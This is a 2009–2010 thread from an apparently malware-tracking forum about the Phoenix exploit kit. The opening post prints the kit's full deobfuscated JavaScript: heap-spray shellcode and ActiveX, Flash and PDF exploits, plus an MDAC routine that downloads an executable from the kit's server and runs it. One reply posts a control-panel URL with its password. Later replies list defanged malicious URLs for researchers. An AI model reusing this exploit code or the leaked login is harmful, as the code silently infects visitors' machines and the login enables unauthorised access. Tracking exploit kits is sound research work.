Author Topic: Phoenix exploit's kit  (Read 15884 times)

0 Members and 1 Guest are viewing this topic.

September 15, 2009, 06:27:29 pm
Read 15884 times

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
Description

http://translate.google.ru/translate?prev=hp&hl=ru&js=y&u=http%3A%2F%2Fwww.hack-info.ru%2Fshowthread.php%3Fp%3D311312&sl=auto&tl=en&history_state0=

Screenshot



Control panel

Code: [Select]
http://www.stiggba.com/phoenix/statistics.php
Exploits

Code: [Select]
http://www.stiggba.com/phoenix/index.php

deobfuscated script

Code: [Select]
function AOL()
{
    try
    {
        var IWinAmpActiveX = document.createElement('object');
        IWinAmpActiveX.classid = 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6';
        IWinAmpActiveX.codebase = "http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab";
        shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3731%u9000");
        bigblock = unescape("%u0c0c%u0c0c");
        headersize = 20;
        slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) {
            bigblock += bigblock;
        }
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) {
            block = block + block + fillblock;
        }
        memory = new Array();
        for (i = 0; i < 666; i++) {
            memory[i] = block + shellcode;
        }
        var bof;
        for (i = 0; i < 1400; i++) {
            bof = bof + unescape("%ff");
        }
        for (i = 0; i < 1000; i++) {
            bof = bof + unescape("%0c");
        }
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
    }
    catch (e) {
        JAVA();
        setTimeout('DSHOW()', 3000);
    }
}
function FLASH10()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.10').GetVariable('$version');
        if ((sv == 'WIN 10,0,12,36') || (sv == 'WIN 10,0,22,87'))
        {
            var swf = document.createElement('iframe');
            swf.setAttribute('src', 'files/10.swf');
            swf.setAttribute('width', 18);
            swf.setAttribute('height', 18);
            document.body.appendChild(swf);
            var memory;
            var nop = unescape('%u0808%u0808');
            var SC = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3831%u9000');
            while (nop.length <= 0x10000 / 2) {
                nop += nop;
            }
            nop = nop.substring(0, 0x10000 / 2 - SC.length);
            memory = new Array();
            for (ass8995 = 0; ass8995 < 0x600; ass8995++) {
                memory[ass8995] = nop + SC;
            }
        }
        else {
            AOL();
        }
    }
    catch (e) {
        AOL();
    }
}
function DSHOW()
{
    var b = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3031%u9000');
    var c = unescape('%u9090%u9090');
    var d = 20;
    var e = d + b.length;
    while (c.length < e) {
        c += c;
    }
    var f = c.substring(0, e);
    var g = c.substring(0, c.length - e);
    while (g.length + e < 0x70000) {
        g = g + g + f;
    }
    var h = new Array();
    for (i = 0; i < 350; i++) {
        h[i] = g + b
    }
    var i = document.createElement('object');
    j.appendChild(i);
    i.width = '1';
    i.height = '1';
    i.data = './img.png';
    i.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
function MDAC()
{
    var p = document.createElement('object');
    p.setAttribute('id', p);
    p.setAttribute('classid', 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
    try
    {
        var q = p.CreateObject('msxml2.XMLHTTP', '');
        var r = p.CreateObject('Shell.Application', '');
        var s = p.CreateObject('adodb.stream', '');
        try
        {
            s.type = 1;
            q.open('GET', 'http://stiggba.com/phoenix/load.php?i=1', false);
            q.send();
            s.open();
            s.Write(q.responseBody);
            var t = './/..//file.exe';
            s.SaveToFile(t, 2);
            s.Close();
        }
        catch (e) {
            SWF();
        }
        try {
            r.shellexecute(t);
        }
        catch (e) {
            SWF();
        }
    }
    catch (e) {
        SWF();
    }
}
function SNAP()
{
    function var1()
    {
        for (var2 = 2, var3 = ''; var2 <= 26; var2++)
        {
            var3 = String.fromCharCode(65 + var2);
            var var4 = new Image();
            var4.src = 'res://' + var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'msoeres.dll' + '/#2/1';
            if (var4.height == 59) {
                break;
            }
            var4 = '';
        }
        return var3;
    }
    function var5(url)
    {
        var var3 = var1();
        if (var3 == '[') {
            FLASH10();
            return;
        }
        try {
            var var6 = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
        }
        catch (e) {
            if (var6 != '[object]') {
                FLASH10();
                return;
            }
        }
        var6.SnapshotPath = url;
        try
        {
            var6.CompressedPath = var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'wab.exe';
            var6.PrintSnapshot();
        }
        catch (e) {
            FLASH10();
        };
        var var7 = setInterval(function ()
        {
            if (var6.readyState == 4) {
                clearInterval(var7);
                window.location = 'ldap://';
            }
        }, 3000);
    }
    var5('http://stiggba.com/phoenix/load.php?i=2');
}
function SWF()
{
    try
    {
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');
        if ((sv == 'WIN 9,0,115,0') || (sv == 'WIN 9,0,16,0') || (sv == 'WIN 9,0,28,0') || (sv == 'WIN 9,0,45,0') || (sv == 'WIN 9,0,47,0') || (sv == 'WIN 9,0,64,0'))
        {
            var swf = document.createElement("iframe");
            swf.setAttribute("src", "files/9i.swf");
            swf.setAttribute("width", 1);
            swf.setAttribute("height", 1);
            document.body.appendChild(swf);
        }
        else {
            PDF();
        }
    }
    catch (e) {
        PDF();
    }
}
function JAVA()
{
    document.write("<applet code = 'Show.class' width='100' height='100'>");
}
function SHOWPDF(fn)
{
    wind = window;
    while (wind.parent != wind) {
        wind = wind.parent;
    }
    wind.location = fn;
}
function PDF()
{
    try
    {
        document.write('<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>');
        var lv = Pdf1.GetVersions();
        lv = lv.split(',');
        lv = lv[4].split('=');
        lv = lv[1];
        sv = lv.split('.');
        sv = sv[0];
        if ((lv == '9.0.0') || (lv == '8.1.2')) {
            SHOWPDF('files/geticon.pdf');
        }
        if ( (sv <= 8) && (sv >= 6) ) {
            if (lv == '7.1.0') {
                SHOWPDF('files/printf.pdf');
            }
            else {
                SHOWPDF('files/collab.pdf');
            }
        }
        else {
            SNAP();
        }
    }
    catch (e) {
        SNAP();
    }
}
MDAC();

/EDIT by SysAdMini Wepawet link added
http://wepawet.cs.ucsb.edu/view.php?hash=0299f11465b1f9188d9ed2fe5b4841a1&type=js

September 16, 2009, 07:07:06 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

September 16, 2009, 01:24:59 pm
Reply #2

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot

September 16, 2009, 05:04:23 pm
Reply #3

h4h4h4h4

  • Jr. Member

  • Offline
  • **

  • 11
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot

thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.

September 16, 2009, 05:18:13 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.
Ruining the bad guy's day

September 16, 2009, 09:32:52 pm
Reply #5

h4h4h4h4

  • Jr. Member

  • Offline
  • **

  • 11
thats cool.  Why would they be so stupid to not change there password?  Im guessing thats the default password.  Looks like we can go in and reset there stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.

Yep sounds good.


August 04, 2010, 06:15:46 am
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

August 18, 2010, 06:37:57 pm
Reply #8

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

August 24, 2010, 04:02:42 pm
Reply #9

detro

  • Newbie

  • Offline
  • *

  • 5
Current Phoenix exploit kit campaigns being pushed today,

hxxp://nevoex65eo.com/ab/tmp/des.jar < I have currently been unable to locate the control panel or payload yet but here is the java sploit

 and

hxxp://79.135.152.217/a/tmp/des.jar which is currently already listed on MDL here http://www.malwaredomainlist.com/mdl.php?search=79.135.152.217&colsearch=All&quantity=50

It appears these are going out in tandem as i am seeing them appear on multiple different client networks simultaneously.


t's have been converted to x's to protect the innocent.

September 03, 2010, 09:06:51 pm
Reply #10

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

September 07, 2010, 03:35:10 am
Reply #11

crunchtime

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
Yet another libtiff.pdf sample from this kit:

hxxtp://ethdem.com/ddt/tmp/libtiff.pdf

Some info on this domain is already on list: http://www.malwaredomainlist.com/mdl.php?search=ethdem.com&colsearch=All&quantity=50

*Edit*
One more: hxxp://www.finworldonline.com/news/tmp/libtiff.pdf

September 08, 2010, 04:24:16 pm
Reply #12

crunchtime

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
One more sample:

hxxp://mypetitebusiness.org/2/tmp/libtiff.pdf

October 04, 2010, 01:21:56 pm
Reply #13

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92
New phoenix ?
Code: [Select]
gotrue.cz.cc/tk/

Code: [Select]
gotrue.cz.cc/tk/u.asx

It's equal

http://popunder777.com/pek/tmp/u.asx


November 17, 2010, 10:33:04 pm
Reply #14

pstash

  • Newbie

  • Offline
  • *

  • 1
Anyone know where I could find a readme.txt file for this kit?  I have a couple of versions of the kit and want to do some analysis on them.  The readme file in one of the versions is all screwy, probably because it was written in Russian before.